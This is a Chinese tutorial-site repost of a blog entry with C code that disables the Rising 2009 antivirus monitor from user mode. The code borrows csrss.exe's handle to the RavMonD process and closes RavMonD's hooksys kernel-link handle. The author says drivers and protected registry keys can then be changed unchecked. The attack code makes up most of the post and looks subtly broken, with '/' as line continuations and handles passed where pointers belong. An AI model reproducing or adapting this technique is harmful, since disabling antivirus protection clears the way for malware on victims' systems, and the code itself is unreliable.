提供了编程的基础技术教程

zl程序教程

您现在的位置是:首页 >  其他

当前栏目

用户层关闭瑞星2009杀毒软件安全保护

保护安全 用户 关闭 2009 杀毒软件
2023-09-14 08:56:51 时间

我写这个纯粹是hacker精神,如果被滥用做病毒木马一类的邋遢东东,可跟偶没关系哦。

 

原理very简单,我发现瑞星监控主要在RavMonD进程中,如果打破其与内核的联系,则

瑞星监控功能就无法正常工作了,怎么打破联系呢?如果是进内核的话当然有很多的办法,

从而没有挑战性了,况且RavMonD会阻止用户进程去加载驱动或者动注册表的关键地方,

比如run子键。下面上测试代码:

 

int main(int argc,char *argv[])
{
    if(argc != 4)
        puts("usage ccon csrss.pid prmd.handle hooksys.handle");
    else
    {
        int pid = atoi(argv[1]);
        int hprmd = atoi(argv[2]);
        int hobj = atoi(argv[3]);
      
        if(!SetDebugPrivilege(true))
            puts("SetDebugPrivilege Failed!");
        HANDLE hcs = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
        if(!hcs)
        {
            puts("Open Csrss.exe Failed");
            PrintErr(GetLastError());
        }
        else //直接打开RavMonD进程会失败的,so采用迂回战术
        {
            HANDLE hprmd_loc;
            if(!DuplicateHandle(hcs,(HANDLE)hprmd,GetCurrentProcess(),/
                hprmd_loc,PROCESS_ALL_ACCESS,false,0))
            {
                puts("Get hprmd_loc Failed!");
                PrintErr(GetLastError());
            }
            else //关闭hooksys的句柄,打破其与内核的联系
            {
                HANDLE hobj_loc;
                if(!DuplicateHandle(hprmd_loc,(HANDLE)hobj,/
                    GetCurrentProcess(), hobj_loc,0,false,/
                    DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS))
                {
                    puts("Get hobj_loc Failed!");
                    PrintErr(GetLastError());
                }
                else
                {
                    if(!CloseHandle(hobj_loc))
                    {
                        puts("Close hobj_loc Failed");
                    }
                    else
                        puts("We Success Finally!!!");
                }
            }
        }
    }
    return 0;
}

 

打破瑞星监控与内核的关联之后,用户进程可以任意加载驱动程序进内核或者篡改注册表

中的关键内容,我测试了一下,虽然第一次修改注册表中的监控内容时瑞星还是会提示用

户是否允许修改,但是这时即使选择否,同样可以修改成功,而且以后的修改瑞星不会再

提示了。


其实防守起来也很容易,瑞星只要不让我们在ring3下取到hooksys的句柄就行了,当然

仍然防不住内核中的攻击,进入ring0还是可以为所欲为。


我的测试环境 windows xp sp3 + 瑞星杀毒2009 21.49.14 测试成功


新型MacOS勒索软件:正在伪装成PS软件传播 本文讲的是新型MacOS勒索软件:正在伪装成PS软件传播,几天前, ESET公司的安全专家发现了一种新型的MacOS勒索软件,属于非常珍贵的物种。这一勒索软件被命名为OSX/Filecoder.E,主要是通过bittorrent网站攻击MacOS用户。
无需连接命令控制服务器的Spora 有可能成为勒索软件之王 本文讲的是无需连接命令控制服务器的Spora 有可能成为勒索软件之王,安全研究人员发现了一种新式勒索软件,该软件被命名为Spora,能够进行强离线文件解密,赎金支付模式也有了许多创新。

相关文章